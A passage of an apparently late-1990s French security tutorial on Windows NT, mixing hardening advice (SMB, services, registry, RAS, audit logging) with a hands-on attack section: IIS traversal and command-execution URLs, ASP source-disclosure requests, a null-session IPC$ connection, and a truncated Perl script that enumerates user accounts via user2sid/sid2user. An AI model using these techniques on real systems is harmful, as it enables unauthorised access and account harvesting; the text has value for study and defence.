-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Windows NT utilise le protocole SMB ( Secure Message Block ) pour controler le réseau et
les accés a distances aux services du serveur.Le protocole SMB est important car il permet
aux users d'avoir accés aux fichiers partagés, au registre et aux autres services du systeme
distant.Les users communicant avec le serveur utilisant le protocole SMB peuvent avoir
accés a n'importe quel service comme un user communicant avec un serveur utilisant NetBIOS
(rotocole utilisé par Windows NT ).Il est possible d'établir les permissions SMB sur des
fichiers, registres et imprimantes.
Windows NT controle les accés avec les logins et password ( note: l'accompte Guest n as
pas de passwords ).Dans les workstation NT 3.51, NT active l'accompte Guest par défaut.
Dans NT 4.0 et NT 5, NT désactive l'accompte Guest sur les workstations ainsi que sur le
serveur par défaut.Gardez l'accompte Guest désactivés sur des machines que vous exposez a
l'internet ou a un autre environement non protégé.
Même si tous les accomptes ont des passwords, un hacker peut encore essayer des logins
et passwords en utilisant une brute force ou une attaque au dictinnaire. our se défendre
contre ce type d'attaque vous devrez utiler des passwords avec au minimun huit caractéres,
ainsi que un mélange de lettres/symboles/chiffres.Vous pouvez aussi établir un nombre de
login erroné aprés lequel le systéme bloque l'accompte ciblé pour une certaine periode.
Vous ne devrez pas etablir de limite pour les login érronés de l'accompte Administrateur
pour éviter les attaques DOS (Denial Of Services) (en effet des logins érronés répétés
désactivent tous les accomptes sur la machine).Bienque vous puissiez renomer l'accompte
Administrateur en quelque chose d'autre et établir un password difficile a cracker vous
devriez aussi désactiver le login de l'accompte Administrateur par le réseaux ce qui signifie
que pour forcer l'accompte Administrateur le hacker doit avoir accés physiquement au serveur.
La meilleure façon de d'interdire les attaques basées sur le SMB contre votre réseau est de
désactiver l'accés au services SMB par l'internet.Si vous avez un routeur , vous pouvez
désactiverles ports UDP/TCP 137, 138, 139, qui désactivent les connections NetBIOS aux ports
TCP/IP de Windows NT.
SAMBA:
-=-=-=-
Samba est une application Freeware de Andy Tridgell dévellopée pour aider les Administrateurs
réseaux a integrer les serveurs Un*x dans un réseau Microsoft Windows NT .L'idée principale
derriere Samba est de laisser des machines Un*x accéder aux fichiers NT.
Samba peut directement accéder aux données Windows NT d'une machine Un*x .Samba est
important de deux point de vue:
1- Il aide a intégrer des machines Un*x sur un environement NT .
2- Samba permet aux hackers d'acceder au serveur NT grace a une machine Linux a tarvers
les port UDP/TCP comme un Trusted Host ( machines considérés comme sures et n'ayant pas
a s'authentifier par un password )
Utilisation de SAMBA vers NT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'utilisation de samba contre NT repose sur 2 commandes importantes. A savoir, smbclient
et smbmount. Avec ces commandes commandes, toute station linux est capable de monter des
partitions NT distantes. Pour savoir connaitre tous les paramétres reférer vous au man ...
Utilisation typique de samba:
smbclient \\\\box_name\\f username password
Server time is Frid Mar 29 15:48:03 1999
Timezone is CST - 1
smb: \>dir
WINDOWS D 10:58 09/03/99
RECYCLED DR 10:58 09/03/99
51141 blocks of size 512. 9641 blocks available
smb: \>
Vous pouvez toujours utilisez le client smb de ADM, ADM-CLIENT-smb disponible en
FTP sur adm.isp.at .
Vulnérabilités NT:
-=-=-=-=-=-=-=-=-=-
La premiere vulnérabilité de Windows NT viens des services que NT fait tourner.
Les Services sont des progammes que NT lance sur le serveur, générallement en fond
de tache, et qui permettent a NT de reconnaitre les différents protocoles, de régir les
serveurs d'impression.
Services d'Alerte NT:
-=-=-=-=-=-=-=-=-=-=-
Windows NT posséde un service d'alerte ( Windows NT Alerter and Messenger services ) qui permet
a un user d'envoyer des messages "pop-up" aux autres users du même domaine ou d'un domaine
considéré comme sûr ( trusted host).Le premier risque de ces services est une attaque de type
social engineering pour convaincre un user de lui céder son password.
Ces services requierent seulement un niveau d'accés Guest sur le réseau Windows NT, vous
devrez donc désactiver ces services pour plus de sécurité d'autant plus qu'ils ne sont pas
indispensables.De plus ces services forcent le réseaux a diffuser les usernames courants
dans la table du NetBIOS, ce qui permet d'effectuer une attaque Brute Force sur un username
valide.
Pour désactiver ces services , selectionnez le menu démarrer, panneau de controle des
options du groupe programme.Dans ce panneau de controle double clickez sur l'icone Alert
and Messenger Services.Windows NT affiche alors une dialog box .Clickez sur la check box
Disable pour désactiver ces services.
NetBIOS:
-=-=-=-=-
Lorsque vous installez Windows NT 4.0, NT crée une NetBIOS share ( partage de fichier,
repertoire, ressources ).Ce partage de fichier laisse n'importe qui avec une permission
d'accés machine avoir un accés total a la NetBIOS share.Il est commun de trouverdes
fichiers partagés (shares) avec tous les accés établis, car NT par défaut établis les
shares avec un accés total.Sous certaine version de NT , un hacker peut utiliser des shares
pour faire crasher la machine.Vous devez donc éliminer les shares de votre systeme ou bien
établir des permissions explicites pour ces shares , pour corriger ces permissions exessives.
Sécurité LAN Manager:
-=-=-=-=-=-=-=-=-=-=-=-
Le Windows NT LAN Manager est un service qui tourne sous Windows NT et qui permet aux
Clients NetBIOS non NT de se connecter a un seveur Windows NT.Les réseaux Windows NT
utilisent pour la plupart le LAN Manager pour connecter des machines tournant sous une
OS compatible au serveur NT (Windows 3.11 etc...)
Une machine sous Windows NT utilisant l'authentification par le LAN Manager est moins
sécurisée qu'une machine avec un authentification de NT a NT.Cela est du au fait que la
sécurité du LAN Manager est moins perfomante que celle de NT a NT et aussi par le fait que
certaines version du LAN Manager peuvent créer d'autres trous de sécurité dans votre réseau.
Mieux vaut utiliser une Workstation NT coté client et un serveur NT coté serveur.
NTNM (NT Network Monitor):
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Le service Network Manager de Windows NT permet a n'inmporte quelle machine tournant
sous NT de se comporter comme un sniffer (qui récupere toutes les informations transitant
sur le réseau ).Une connection au NTNM requiert un niveau d'accés administrateur et le
programme nécessaire que Microsoft ne distribu qu'avec la licence de Windows NT Server 4.0
L'agent du NTNM requiert un password de l'utilisateur avant de pouvoir etre utiliser.
Une des faiblesse de Windows NT est qu'il encrypte ce password avec une méthode trés
superficielle dans une dll (data-link library).N'importe qui avec un accés en lecture sur
la bhsupp.dll peut obtenir le password avec un minimum d'effort.Vous ne devez lancer l'agent
NTNM que quand cela est absolument nécessaire car il peut étre sujet a des attaques.
Désactivez votre NT Network Monitor ( à l'interieur du panneau de controle ) et effacez la
bhsupp.dll.Lorsque vous devez utiliser le NTNM utilisez un password unique ou pas de password
du tout et ensuite éffacez a nouveau la bhsupp.dll.
Service RSH:
-=-=-=-=-=-=-
Micorosoft possede une version de la commande Un*x rsh ( remote shell program ) avec le
Kit de ressources de Windows NT qui exécute toutes les commandes sous un accompte systéme,
indépendament de quel utilisateur lance la commande.La commande rsh permet a un utilisateur
local d'exécuter un programme sur une remote host.L'accompte systéme est l'accompte le
plus puissant sur une machine NT.Un utilisateur connecté sur votre serveur par cette méthode
peut exécuter n'importe quelle commande sur le serveur , comme un utilisateur systéme.
Le service rsh est donc dangereux a utiliser et vous devriez ne jamais le lancer sans savoir
ce que vous faite a 200%.Si vous vérifiez votre serveur et que vous vous appercevez que
le service rsh est lancé, vous pouvez l'effacer en utilisant l'outil instsrv, qui se trouve
aussi dans le kit de resources de Windows NT.Pour désactiver le service rsh,entrez la commande
suivante sous la console ( comme la commande MS-DOS ) :
c:\>instrsv rshsvc remove
Service SCHEDULE:
-=-=-=-=-=-=-=-=-
Le service SCHEDULE permet aux administrateurs de "programmer" l'exécution de certaines
taches a un moment précis. Habituellement le service SCHEDULE exécute les taches sous
l'accompte systéme, il peut donc modifier les priviléges des accomptes, ceci signifie qu'un
hacker qui modifie la configuation de l'accompte SCHEDULE pour lancer un Trojan peut utiliser
le service SCHEDULE pour modifier les permissions sur le réseau.Windwos NT désactive le
service SCHEDULE quand vous configurez votre systéme comme une machine sécurisé de
classe C2.
Il y a deux façon de réduire les risques de l'utilisation de ce service :
1- Vous pouvez reconfigurer le service avec un accés de faible niveau lorsqu'il
exécute les commandes.
2- Vous pouvez désactiver le service.Pour cela allez dans le menu démarrer puis
panneau de controle du groupe programmes, double clickez sur l'icone SCHEDULE Service.
Registre NT:
-=-=-=-=-=-=-
L'OS 32-bit de Windows enregistre la plupart des informations spécifique au systéme à
l'interieur de la base de registre de Windows.Les seules personnes qui ont normalement
accés a la base de registre devrais étre les Administrateurs et les Super users. Techniquement
les utilisateurs qui doivent installer des programmes ou qui doivent surveiller les audits ou
les autres informations systémes devraient avoir accés a la base de registre de Windows NT.
Si des Users ont des droits d'accés, ou si l'accompte Guest a des priviléges, des
utilisateurs non-authaurisés et des hackers peuvent éditer la base de registre de Windows.
Un utilisateur avec le privilége d'éditer la base de registre de Windows NT peut
fondamentallement changer le setup de l'installation du serveur Windows NT.
Aprés qu' un intruder est ouvert la base de registre de Windows NT, il peut facilement
lire la liste des controles d'accés depuis les clé de registres:
HKEY_LOCAL_MACHINE et HKEY_CLASSES_ROOT.
Si le hacker a des droits pour éditer a l'interieur de la base de registre NT, il peut
changer chaque entrée (programmes, fichiers associés ...) avec une permission en ecriture
pour lui, il peut alterer les fichiers associés tel que un .txt ne lance plus notepad.exe
mais un Trojan ou un autre programme pour modfier ou faire rebooter le systéme.
De plus si votre accompte Guest a un accés en ecriture sur la base de registre soit
votre Windows NT est trés mal configuré soit un intru est déja passé par la.Vous devez
revoir les permissions pour la base de registre assez souvent.Sous Windows NT 4.0 vous
pouvez empécher l'accés a la base de registre par le réseau en ne laissant que les users
ayant physiquement accés a la console editer la base de registre.
Système NT et Virus :
-=-=-=-=-=-=-=-=-=-=-
Seuls des virus écrits dans des langages de haut niveau affectent Windows NT contrairement
aux virus écrits en langage de bas niveau comme l'assembleur(jusqu'a preuve du contraire :] )
c'est à dire les virus Java, Scripts MS-Words, Maccro d'Exel ... peuvent attaquer votre
systéme NT. Les autres types de virus peuvent affecter Windows NT seulement si vous possédez
un multi boot (Linux, OS/2, Unix, Windows 3x, Windows 9x avec Windows NT).Si vous avez
un virus qui detruit le secteur de boot, le virus pourra aussi détruire votre partition
Windows NT.
Pour quelques exemples, http://www.icubed.com/virus/ntvirus.html ...
Comme généralement le système Windows NT sert de serveur de fichier dans un réseau,
constitué d'autres systèmes comme MS-DOS ou Windows 3x-9x, il existe des anti-virus
basés sur NT pour prévenir contre ce genre d'attaque.
Sécurité des Serveurs FTP :
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Dans l'installation de votre réseaux Windows NT, vous connecterez généralement au moins une
machine à l'internet. Si vous avez un service FTP à l'interieur de votre domaine, vous
connaissez les problémes du serveur FTP de Windows NT. L' IIS ( Internet Information Server )
FTP est plus securisé que le serveur FTP standard de Windows NT.
Une des plus grande faiblesse du serveur FTP de NT est qu'il ne loggue pas les accés au réseau
par défaut. Pour qu'il loggue les accés vous devrez modifier le numéro d'un paramétre dans la
clé de registre suivante:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FtpSvc\Parameters
Pour activer la fonction de log du FTP vous devrez mettre les paramétres LogAnonymous,
LogFileAcces et LogNonAnonymous à 1.Pour savoir comment éditer les clés de la base de
registre référez vous au paragraphe Logs . POur désactiver les logs, mettez ces valeurs
à 0.
Utilitaire Rollback.exe:
-=-=-=-=-=-=-=-=-=-=-=-=-
Le CD-ROM de NT 4.0 contient un utilitaire appelé Rollback.exe, qui peut comprométre votre
systéme si vous le lancez.Si vous le lancez ce programme va effacer toutes les entrées
du Registre du systéme.Microsoft à désigné roolback.exe comme un utilitaire pour aider les
administrateurs à "nettoyer" les entrées du Registre de la base de registre.Vouz devez donc
effacer ce programme de votre serveur ou si vous voulez le garder le renommer pour eviter
une attaque D.o.S ( Denial of Service ) au rollback.exe.
Securité du service RAS ( Remote Access Services):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Un des service les plus utilisé sur les serveurs Windows NT est le RAS de Microsoft, c'est
un service qui gére les logins des remotes users sur un réseau Windows NT, incluant les
logins provenant d'internet et téléphoniques.Le RAS travaille en paralléle du LSA ( Local
Security Authority ), du SAM ( Security Account Manager ) et du SRM ( Security Reference
Monitor ) pour permettre aux users de se logguer sur le réseaux par un endroit non
physiquement connecté au réseau.
Les utilisateurs se connectent au serveur avec RAS puis sont ensuite sur le réseau.
Le RAS commence comme une connection normale sur un réseau.L'ordinateur de l'utilisateur
( remote ) passe le password du login a travers le MD-4 et l'envoie, en même temps que
l'username ( login ), au serveur Windows NT qui vérifie la valeur du password passé au MD-4
avec sa propre base de donnée des mot des passe.Bienque par défaut, le RAS encrypte seulement
le password les ordinateurs envoient générallement les transmissions régulieres" en clair ".
Ce qui signifie que le RAS peut ouvrir des possibilités de hack à travers un simple serveur
Web ou FTP.Un utilisateur avec un des droits d'accés du style "trusted host" peut lire et
ecrire des fichiers de la machine qui fait tourner RAS, ce qui implique qu'il y ai des
informations sur la machine RAS que le hacker peut utiliser pour ensuite faire du Social
Engeniring ou hacker la machine.Si la machine RAS fait partie d'un domaine étendu ( ce qui
est généralement le cas ), alors le hacker peut tirer des informations ( protégées ou non )
du réseau.
Il y a plusieurs maniéres différentes pour sécuriser votre serveur RAS et les connections en
remote au RAS.
1- Protégez le server a l'interieur d'un sous-réseau de firewall (Screening Router).
Placez un routeur qui bloque les accés entre le serveur RAS et les ordinateurs a l'interieur
du firewall d'un coté du sous-réseau.Placez un routeur qui bloque certaines activités
(par exemple l'accés FTP ou certaines IP ) de l'autre coté du sous-réseau.
2- Activez l' "Auditing" pour le RAS.Pour activez cette fonction pour le RAS, selectionnez
dans le menu démarrer : Programs option Administrative Tools program group.A l'interieur
selectionnez : User Manager for domains program, ensuite selectionnez les options pour activer
les services d'audit de Windows NT.Aprés cela vous aurez besoin de modifier le registre de
Windows pour activer cette fonction pour le RAS.Pour cela lancez regedit et mettez la valeur
de clé suivante à1.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\logging
Vous devez ensuite arréter le RAS et rebooter le serveur.
3- Dans le RAS, activez l'authentification RAS.L'authentification des packets RAS informe
l'user de signer digitallement chaque packet que le remote user transmet au serveur.
Obliger les users à signer les packets vouz protége contre des packets spoofés d'un hacker.
Car une modification d'un packet par un hacker détériore la signature digitale.
4- Dans le RAS, activez la session d'encryption.Si vous activez la session d'encryption,
le serveur RAS enverra une clé de session au remote user aprés le login de l'user.Alors que
le RAS une encypytion symétrique pour la clé de session, le serveur RAS génére une nouvelle
clé de session pour chaque login d'user ce qui procure une sécurité contre une réutilisation
de clé par un intruder.
Le plus sérieux probléme avec l'encryption RAS de Windows NT 3.51 et NT 4.0 est que
le serveur transmet la clé de session " en clair ", ce qui signifie qu' un hacker peut
utiliser la clé de session pour "interférer" dans les transmissions d'une session courante
d'un user.Windows NT 5.0 (ou Windows 2000 ) pourra contrer ce probléme grâce a l'implémentation
Kerberos.Kerberos procure une sécurité assez signifiante pendant les transactions même pour
les systémes d'accés distant.
5- Dans le RAS, activez les fonctions dial-back.Lorsqu'un user se loggue dans le serveur
RAS avec le dial-back activé, le seveur vérifiera le login de l'user , et ensuite démarrera
la connection.Le serveur RAS compose alors un numéro préprogrammé pour l'user et et re-connecte
la machine de l'utilisateur distant.Les connections par dial-backsont extrémement sécurisés,
du fait que le dial-back vérifie la localisation de l'utilisateur comme identification.
Si vous avez des groupes d'accés que la machine ne peut reconnecter en utilisant les fonctions
dial-back, (connection d'un hotel ou d'un cyber... ) vous pouvez laisser ces users se
connecter au RAS en utilisant un accompte qui ne rappelle pas un numéro pré-programmé.
6- Dans le RAS, créez des limitations qui spécifient durant quelles heures le serveur RAS
laisse les utilisateurs distants se connecter .
Si vous respectez ces quelques régles votre serveur RAS sera plus sécurisé qu'une simple
instalation du serveur RAS.
Logs et Audits:
-=-=-=-=-=-=-=-
Par défaut Windows NT désactive les audits durant le procéssus d'installation.Windwos NT
comprend différent programmes et systémes pour loguer ( comme le programme Event Viewer)
Le systéme Windows NT requiert une instruction spécifique de l'administrateur systéme pour
activer le log des audits.L'Event Viewer de Windows NT procure aussi des informations
importantes sur l'installation et le démarrage des services.
Le programme Event Viewer.
Activation du systéme de log:
Avant de pouvoir monitorer les activités sur votre réseau Windows NT, vous devez activer
le service de log de NT.Pour l'activer, suivez les étapes suivantes:
1- Loguez vous en tant qu'administrateur.
2- Clickez sur le bouton start, sélectionnez l'option des programmes, et choisissez le
groupe Administrative Tool program.A l'interieur de ce groupe , selectionnez le programme
User Manager for Domain.Windows NT lancera ce programme.
* Le programme User Manager
3- Dans le programme User Manager , selectionnez le menu Audit option.
Windows NT affichera alors une boite de dialogue.
boite de dialogue du menu des options d'Audit.
4- Dans cette boite de dialogue, selectionnez le bouton Audit These Event.
Windows NT activera la liste des options d'audit.
5- Dans ce menu clickez sur les checkbox dans chaque colones pour activer les options
que vous voulez que NT logue.
_______________________________________________________________________
>Log on/Log off: Permet à l'Event Viewer de maintenir l'enregistrement des logins locaux
et distants.
>File and Object Access: Permet à l'Event Viewer de maintenir l'enregistrement de
tous les accés fichiers, repertoires et imprimante. Ces fichiers et repertoires doivent
étre sur la partition NTFS pour activer le log.aprés avoir activé cette option, utilisez
Windows NT Explorer pour selectionner les audits pour des fichiers et repertoires
individuels.
>Users and Group Management: Permet à l'Event Viewer de maintenir l'enregistrement des
accomptes ou groupes d'users que l'administrateur systéme ou d'autres users authorisés
créent, changent, ou éffacent. Cette option permet aussi le log du changement de password
que les users changent ou établissent.
>Security Policy Changes: Permet à l'Event Viewer de maintenir l'enregistrement de n'importe
quel changement des droits des users et des options d'audit.
>Restart, Shutdown, and System: Permet à l'Event Viewer de maintenir l'enregistrement
de l'arret, rebootage et redémarrage du systéme et des workstations locales.
>Process Tracking: Permet à l'Event Viewer de maintenir l'enregistrement de l'activation
des programmes et des duplications, des accés d'objets indirects et des processus de
sortie.
_______________________________________________________________________
6- Dans la boite de dialogue clickez ensuite sur le bouton OK.Windows NT retournera à
l'User Manager.
7- Pour fermer l'User Manager selectionnez l'option Exit.Windows NT retournera au bureau.
* Audits de la Base d'Objets avec NT:
Le systéme d'audit décrit précédement est un pas vers plus de sécurité mais reste imparfait,
pour activer l'audition pour d'autres options non inclues dans la boite de dialogue des
options de l'User Managervous devrez modifier des entrées dans le systéme de Registre.
Le systéme de registre de Windows NT enregistre les informations sur les programmes installés
sur la machine, les options de l'OS et beaucoup d'autres informations.Vous pouvez ajouter
des auditions pour votre serveur en utilisant l'éditeur de registre regedit pour ajouter des
informations au systéme de registre.Pour lancer le programme regedit suivez les étapes
suivantes:
1- selectionnez dans le menu démarrer l'option Run.Windows NT affiche la boite de dialogue du
menu Run.
2- Tapez c:\winnt\regedit
3- clickez sur OK pour afficher l'editeur de registre.
* Editeur de registre:
Dans les sections suivantes vous utiliserai l'éditeur de registre pour ajouter des informations
supplémentaire pour le systéme d'audits a la base de registre du systéme.
Ces informations additionnelles sur l'audition permettra à Windows NT de surveiller la base
d'objets, les priviléges, et les arréts quand les logs d'audits sont pleins.
* Audits de la base d'Objets:
Bienque Windows NT vous permette des audits sur des fichiers et objets individuels dans
la partition NTFS, NT ne supporte pas directement les audits des services et objets basiques
du systéme, souvent appelés base systeme objects.Pour activer les audits sur ces objets vous
devrez utiliser regedit pour ajouter la valeur de clé de registre suivante dans la base de
registre des clés:
HKEY_LOCAL_MACHINE_\System\CurrentControlSet\Control\Lsa:
Name : AuditBaseObjects
Type : REG_DWORD
Value: 1
Pour ajouter cette clé de registre a la base de registre suivez les étapes suivantes:
1- Dans l'editeur de registre , double clickez sur le repertoire
HKEY_LOCAL_MACHINE.
2- Dans l'arbre de répertoire qui s'affiche selectionnez le répertoire System.
3- Dans le répertoire System sélectionnez le répertoire CurrentControlSet.
4- Dans le répertoire CurrentControlSet sélectionnez le répertoire Control.
5- Dans le répertoire Control sélectionnez le répertoire LSA.L'éditeur de registre
affichera la fenétre suivante:
6- Sélectionnez dans le menu Edit "New option"puis "DWORD Value".l'éditeur de
registre va ajouter une ligne vide a la liste de la clé.
7- Dans la ligne vide, entrez le nom AuditBaseObjects appuyer sur
8- Dans l'éditeur de registre clickez sur la nouvelle clé AuditBaseObjects.
L'éditeur de registre affichera la boite de dialogue de la DWORD Value.
9- Dans la le champs des valeurs changez la valeur de 0 à 1.Clickez sur OK.
Aprés cela l'éditeur de registre aura une nouvelle clé de registrequi permet au systéme
(si l'administrateur systéme a activé les audits sur les accés des objets)
les audits sur la base d'objets , comme pour des objets réguliers.
Note: l'utilisation abusive du systéme de log et des audit peut dégrader les performances
de votre systéme, aussi évaluez ce qui doit étre logué pour chaque serveur.
De plus Windows NT sauve les logs locallement sur le disque dur, ce qui implique
que si un hacker prend le controle de votre systéme les logs peuvent étre modifiés,
c est pour quoi il est préférable que les logs soient sauvés et centralisés sur un
serveur protégé.
+--------------------------------+
| 3rd PART: Travaux Pratiques |
| Level: include |
+--------------------------------+
Attaques possibles contre un serveur NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les paragraphes suivants montrent les différentes attaques qu'une personne peut tenter pour
pénétrer sur un réseau NT, ou renforcer sa situation au sein du réseau. D'autre part,
il n'y a pas d'index d'attaques. Il est clair que ce qui est important reste la
combinaison de toutes ces méthodes.
Vulnérabilité aux attaques TCP:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Grace a la façon dont Windows NT et NetBIOS appréhendent les paquets TCP, Windows NT est assez
résistant aux attaques basés sur le protocole TCP. La seule attaque que peut tenter un hacker
contre un serveur Windows NT est la "man-in-middle-attack ( ou "session hijaking attack" )
qui consiste a forcer le réseau a accepter l'ip du hacker comme une "trusted host".
En régle générale donc les réseaux Windows NT sont assez sécurisés au niveau des attaques
basé sur le protocomes TCP, exepté lorsque celle ci ont directement pour cible les ports
TCP ou UDP.
Denial Of Service:
-=-=-=-=-=-=-=-=-=-
Une attaque de type Denial Of Service est simplement le fait de rendre un service,
une workstation, serveur, ou un service bien spécifique out, c'est une des attaques les plus
communes contre un serveur, mais loin d'être la plus interéssante ... :]
Il y a plusieurs raisons a une attaque de ce type:
1- Le hacker a instalé un Trojan qui ne prendra effet qu'aprés un reboot du serveur.
2- Le Hacker espére couvrir ses traces (mauvaise idéé), ou veux couvrir une activité
du CPU (central processing unit) du serveur par un crash hazardeux.
3- Le hacker veux juste crasher le serveur. >S'appelle t'il Hacker ou Lamer ?
Pour trouver des DoS de toute sorte, Win32 Vs Win32, Linux Vs Win32 etc ...
Les archives de Genocide 2600 reste assez complètes. (packetstorm.genocide2600.com)
Internet Information Services (IIS):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Soyons clair ! Via un serveur web, il est fort possible qu'on ne puisse pas rentrer sur
votre réseau, mais par contre il y a d'énorme chance d'obtenir des informations essentielles
sur votre système, voire un account ...
Tout d'abord, vous savoir quelle version de Server Web est utilisé, il y a plusieur outils.
L'adresse www.netcraft.com reste une bonne solution anonyme... Sinon vous pouvez toujours
vous connecter en telnet sur le port 80 (ou 8080 etc ...) et taper get * .
Cela vous renvoi une page le code d'une page HTML ainsi que les caractéristique du serveur
web. Vous pouvez toujours utiliser le tool 1nf0ze aussi ... =)
Commençons par le celebre Serveur Web de Microsoft, Internet Information Server.
Il est fournit d'office sur WorkStation/Server, ce qui explique donc qu'on le voit un peu
partout. Les versions actuelles sont bien moin buggés que les premiéres mais ne sont toujours
pas à l'abri de quelques trou de sécurité ...
Bien souvant les administrations des serveurs web, se font directement via le browser.
Pour les retrouver, il faut chercher les directory suivants /scripts/iisadmin,
/_vti_bin/_vti_adm, /iisadmin/isadmin, /issadmin ...
Rhino9 (rhino9.com), a mis au point un tool de base appellé grinder qui permet de rechercher
des repertoires particuliers sur des serveurs web.
D'autre part, ce qui est intéressant est de faire lister les files sur un serveur, come si
vous tapier directement files:\\c:\ . Ces lignes marche uniquement sur de vielle version
de IIS:
http://www.ducon.com/..\..
http://www.ducon.com/scripts..\..\scriptname
Si vous avez reussit a mettre un file, back door ou autre trojan grâce a un accés en écriture.
Vous êtes bloqué car vous ne pouvez pas l'executer. La bonne solution reste de le faire
faire via le serveur web.
http://www.ducon.com/scripts/toto.bat?&COMMAND1+?&COMMAND2
Si les bugs cités precedemment ne fonctionne plus, et si vous vous retrouver dans le cas:
Accés en ecriture mais pas en execution, comme c'est le cas via share bien souvent.
Placer vos propres scripts dans /scripts du server et executer vos commandes via le
serveur web. Attention tout de même au logs ;-)
Active Server Pages:
-=-=-=-=-=-=-=-=-=-=-
Les ASP sont en faire l'équivalent du CGI sous Unix en soit disant plus efficasse.
Ces script que l'on trouve avec l'extention .asp un peu partout sur le web,
reste de mini-application qui interface avec des soft Microsoft bien souvent comme
Access par exemple pour la gestion de base donnée.
Les scripts ASP reste dans files HTML ... les codes se trouve compris entre les
tags <% et %> .
Les ASP sont utiliser sous NT 4 / IIS 3.0 ou Win95/98 avec personnal web server avec
asp.exe .
Son principe de fonctionnement est simple:
1. Le client execute une requête: www.trouduc.com/default.asp
2. Le serveur execute le sscript asp en local, génere une page web et la transmet au client.
Donc, si vous faites un view sources, vous n'aurez que le résultat, et pas le script ASP.
Hors celui reste intéressant cart il contien souvent des infos sur le systèmes, et même
voir des authentifiactions pour des bases de données, donc des passwords. =)
Il existe différente méthode pour essayer de piquer un source ASP.
Selon les patch utilisé ces lignes de comandes peuvent marcher:
http://www.ducon.com/default%2easp
http://www.ducon.com/default%2e%41sp
http://www.ducon.com/default.asp::$DATA
http://www.ducon.com/shtml.dll?.asp
Sur personnal web server, faites un telnet sur le port 80 du serveur et tapez:
GET /default.asp. HTTP/1.0
Si tout va bien cela vous revoi le code ASP.
NetBios / NetBeui via TCP/IP:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NetBios est un protocole trés simple développé par Microsoft au temps du bon vieux
Dos. IL est utilisé pour les ressources partagé ou autre comandes lié au réseaux
sous Windows. Son avantages est le fait qu'il s'empile trés bien avec le TCP/IP,
donc qui vous autorise à exécuter certainnes commandes via le net.
Les principales commandes restent:
nbtstat
net file
net share
net start/Stop
net use
net view
etc ...
Le groupe Rhino9 (www.rhino9.com) est auteur de plusieurs outils à ce sujet. "Legion" 2,
reste trés performant et vous propose de scanner tout un domaine de classe B/C,
qui montera directement les ressources accéssible de la machine distante.
Inter-Process Communication (IPC$):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Si vous vous connecter à serveur via IPC$ vous obtenner une liste de partition supplémentaire
sur laquelle vous pourrez acceder directement s'il n y'a pas de mot de passe ou faire du
brute force avec NAT.
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.
C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0
Share name Type Used as Comment
-----------------------------------------------------------------------
Inetpub Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
Windows NT Security Identifiers (SID) :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sur un système NT, des Security Indentifier (SID) sont générés pour chaque account ou groupe
de travail. Les SID sont uniques sur un système et obtenu sur ce que l'on appelle "Authority".
Bien souvent il s'agit d'un domaine ... Et les explications continuront sous cet angle pour
faciliter la compréhension ...
Il y a des SID que l'on rencontre plus ou moins souvent, mais qui sont universel sur toute
les machines. Voila les plus importants ...
* SECURITY_NULL_SID_AUTHORITY: Groupe sans membres, souvent utilisé pour le SID d'un objet
inconnue.
* SECURITY_WORLD_SID_AUTHORITY: Le domaine (authority) est responsable du groupe "Everyone".
* SECURITY_LOCAL_SID_AUTHORITY: Valeur attribuer à un utilisateur qui à le droit de se logger
en local sur la machine.
* SECURITY_NT_AUTHORITY: C'est le plus important car il vous permettra d'avoir des informations
sur les accounts, groupe, domain, service etc ...
Attaque utilisant les SID2USER.EXE et USER2SID.EXE
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'objectif est de récupérer la liste des utlisateurs sur un serveur NT =) Donc d'avoir
accés au informations contenue dans SECURITY_NT_AUTHORITY ...
D'abord connectez vous à l'IPC$ de la machine remote comme vu précedemment.
Executer la commande:
>user2sid \\trouduc.com "Domain Admins"
Cela vous renvoit soit un message d'erreur comme: "LookupAccountName failed - no such account",
soit une chaine de caractére de la forme:
S-A-B-C-.....D.....-.....E....-....F.....-...G
Maintenant il faut utiliser la 2ème commande, sid2user.exe pour récupérer des noms
d'utilisateur ...
>sid2user \\trouduc.com B A ....D.... .....E.... ....F.... 1000
(non il n'y a pas de - sur la deuxième ligne de commande)
Recommencez en incrémentant le 1000 jusqu'a avoir "LookupSidName failed" ...
Voila un script perl qui automatise toutes opérations. Bien utile, surtout pour
l'incrémentation finalle du 1000 .. Vous avez besoin de perl.exe =)
#Created by Mnemonix 08/06/98
#
$target=$ARGV[0];
$password='""';
$user='""';
$break=0;
$n=0;
system ("cls");
print ("USERLIST\nCreated by Mnemonix\n11th of June 1998\n\n");
print ("Connecting to IPC\$ share on $target...\n");
$connect=system ("net use \\\\$target\\ipc\$ $password /user:$user");
if ($connect==0)
{
print ("Connected...\n\n");
print ("Getting the SID of the Guest account on $target\n");
system ("user2sid.exe \\\\$target Guest > u2s.tmp");
open (FILE , "u2s.tmp");
seek(FILE,6,0);
while ($break < 5)
{
$char = getc (FILE);
if ($char eq "-")
{
$char=" ";
@auth[$n]=$char;
$break++;
}
else
{
@auth[$n]=$char;
}
$n++;
}
close(FILE);
system ("del u2s.tmp");
#print ("This is auth 1: ");
#print @auth;
print ("\n\n");
open (HANDLE, ">temp.txt");
select (HANDLE);
print @auth;
close (HANDLE);
select (STDOUT);
open (AUTH, "temp.txt");
$line=;
print ("Retrieving userlist...the list of users will be stored\n");
print ("in a text file called $target.txt\n");
$count=1000;
while ($count < 1100)
{
system("sid2user \\\\$target $line $count >> $target.txt");
$count++;
}
